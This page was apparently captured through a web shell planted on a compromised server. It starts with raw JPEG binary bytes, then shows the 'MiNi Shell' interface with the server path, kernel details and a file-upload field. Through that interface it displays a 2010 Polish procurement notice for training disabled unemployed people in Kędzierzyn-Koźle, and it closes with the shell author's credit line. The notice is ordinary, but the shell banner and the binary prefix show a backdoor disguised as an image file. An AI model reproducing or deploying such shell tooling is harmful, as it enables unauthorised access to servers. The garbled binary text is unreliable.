JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100617/172790-N-2010.html

<p class="kh_header"><b>Kędzierzyn-Koźle: Przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu</b><br>
<b>Numer ogłoszenia: 172790 - 2010; data zamieszczenia: 17.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Anny 11, 47-200 Kędzierzyn-Koźle, woj. opolskie, tel. 077 4827041 do 43, faks 077 4827041.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> opke@praca.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pup-kkozle.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: Część 1 Pracownik ochrony na licencję I stopnia. Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych. Część 2 Kierowca wózka jezdniowego.
Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych. Część 3 Sprzedawca w handlu hurtowym i detalicznym.
Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Posiadają aktualny wpis do rejestru instytucji szkoleniowych wydawany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej oraz potwierdzenie, że wpis został zaktualizowany na 2010 rok.
2. Kopia odpisu z właściwego rejestru /wpis do ewidencji działalności gospodarczej, KRS/
3. Kopia dokumentu potwierdzająca zarejestrowanie w ogólnopolskim rejestrze firm posiadających program nauczania dla kierowców wózków jezdniowych z napędem silnikowym wydana przez Ośrodek Doskonalenia Kadr nadzorowany przez ministra właściwego do spraw gospodarki w Mysłowicach /dot. części 2 zamówienia/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonali należycie co najmniej 3 usługi szkoleniowe dla minimum 10 osób każda, w następujących zakresach tematycznych związanych z przedmiotem zamówienia: część 1- szkolenia z zakresu: pracownik ochrony na licencję I stopnia; część 2 - szkolenia z zakresu kierowca wózka jezdniowego; część 3  - szkolenia z zakresu sprzedaży w handlu hurtowym i detalicznym</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonają usługę szkoleniową w dostosowanych ilościowo i jakościowo pomieszczeniach /do zajęć praktycznych i teoretycznych/, których liczba i pojemność jest adekwatna do wielkości grup szkoleniowych, jak również harmonogramu zajęć, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, zgodnie z rozporządzeniem MPiPS z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy  (tekst jednolity Dz. U.z 2003r. Nr 169, poz. 1650 z późniejszymi zmianami). 2) Udostępnią bezrobotnym niepełnosprawnym: część 1 - zamówienia: sprzęt, urządzenia, wyposażenie na czas realizacji zamówienia np.: rzutniki, tablice, wyposażenie sali gimnastycznej, broń; część 2 - zamówienia: sprzęt, urządzenia, wyposażenie na czas realizacji zamówienia np.: rzutniki, tablice, odpowiednio przystosowany do zajęć praktycznych wózek jezdniowy, kasy fiskalne - minimum 6 sztuk, część - 3 zamówienia: sprzęt, urządzenia, wyposażenie na czas realizacji zamówienia np.: rzutniki, tablice, komputery- minimum 13 stanowisk komputerowych, kasy fiskalne - minimum 6 sztuk, niezbędne do prawidłowej realizacji zamówienia i udostępnione przez Wykonawcę bezrobotnym niepełnosprawnym na czas trwania szkolenia. Ilość sprzętu i urządzeń musi być adekwatna do wielkości grup szkoleniowych, jak również harmonogramu zajęć.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zapewnią osoby do prowadzenia zajęć dydaktycznych posiadające odpowiednie kwalifikacje, kierunkowe wykształcenie, dodatkowe kwalifikacje lub uprawnienia związane z przedmiotem zamówienia. Osoby prowadzące zajęcia dydaktyczne muszą wykazać, że w ciągu ostatnich trzech lat prowadziły zajęcia na co najmniej 5 różnych szkoleniach zgodnych z przedmiotem zamówienia. Przy czym powyższe doświadczenie musi dotyczyć zajęć dydaktycznych pokrewnych tematycznie z zajęciami, które będą prowadzić w ramach wybranej części zamówienia. 
2) Zapewnią nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia, przez co należy rozumieć ustalenie opiekuna grupy, który jest do dyspozycji grupy w trakcie szkolenia i odpowiada za organizację i sprawny przebieg szkolenia. Wymaga się, aby co najmniej opiekun szkolenia lub osoba sprawująca nadzór pedagogiczny nad realizacją szkolenia posiadała uprawnienia pedagogiczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie, że Wykonawca zaangażuje się w pozyskiwanie miejsc pracy dla uczestników realizowanego szkolenia lub  zorganizuje spotkania z pracodawcami poszukującymi pracowników na stanowiska związane z realizowanym przez Wykonawcę przedmiotem zamówienia / Część 1- Pracownik ochrony na licencję - I stopnia, Część 2- Kierowca wózka jezdniowego, Część 3- Sprzedawca w handlu hurtowym i detalicznym /.  Powyższe warunki dotyczą firm zapewniających zatrudnienie na terenie powiatu Kędzierzyn-Koźle /Zał. nr 9 do formularza oferty/. 2) Ramowy plan szkolenia. 3) Szczegółowy plan szkolenia. 4)Oświadzcenie o posiadaniu przez Wykonawcę certyfikatów jakości usług. W przypadku posiadania certyfikatu należy załączyć jego kopię. 5)Kopia wzoru dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji (proszę załączyć wzór), który otrzymają bezrobotni niepełnosprawni po ukończeniu z wynikiem pozytywnym szkolenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian umowy w stosunku do treści zobowiązania, na podstawie którego dokonano wyboru Wykonawcy; w szczególnie uzasadnionych przypadkach o obiektywnym charakterze niezależnych od Wykonawcy lub korzystnych dla Zamawiającego i leżących w interesie publicznym, a których nie można było przewidzieć w chwili składania ofert dotyczących:-miejsca szkolenia - jednakże, nowe miejsce odbywania zajęć musi spełniać warunki wymienione w SWIZ i nie może być gorsze niż wymienione w ofercie zarówno pod względem użyteczności jak i lokalizacji, -osób prowadzących szkolenie - jednakże, zmiana kadry dydaktycznej nie może pociągnąć za sobą obniżenia jakości szkolenia a wykładowcy  muszą spełniać warunki wymienione w SWIZ i nie mogą posiadać niższych kwalifikacji niż osoby zaproponowane w ofercie, - zmiany daty realizacji szkolenia, - zmiany kosztów osobogodziny szkolenia, zmiany kosztów szkolenia jednego uczestnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pup-kkozle.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kędzierzynie - Koźlu, ul. Anny 11, 47-200 Kędzierzyn - Koźle.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Kędzierzynie - Koźlu, ul. Anny 11, 47-200 Kędzierzyn - Koźle pok. nr 8 I piętro /sekretariat urzędu/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitału Ludzkiego  Działanie 7.2 Poddziałanie 7.2.1...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: 
Część 1 Pracownik ochrony na licencję I stopnia.
Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: 
Część 1 Pracownik ochrony na licencję I stopnia.
Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: Część 2 Kierowca wózka jezdniowego. Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: Część 2 Kierowca wózka jezdniowego. Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia specjalistycznego - 80510000-2 zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. posadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: Część 3 Sprzedawca w handlu hurtowym i detalicznym. Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przeprowadzenie szkoleń dla bezrobotnych niepełnosprawnych zarejestrowanych w Powiatowym Urzędzie Pracy w Kędzierzynie-Koźlu: Część 3 Sprzedawca w handlu hurtowym i detalicznym. Szkolenie przeznaczone jest dla 12 bezrobotnych niepełnosprawnych. Usługi szkolenia zawodowego - 80530000-8  zgodnie ze Wspólnym Słownikiem Zamówień Publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com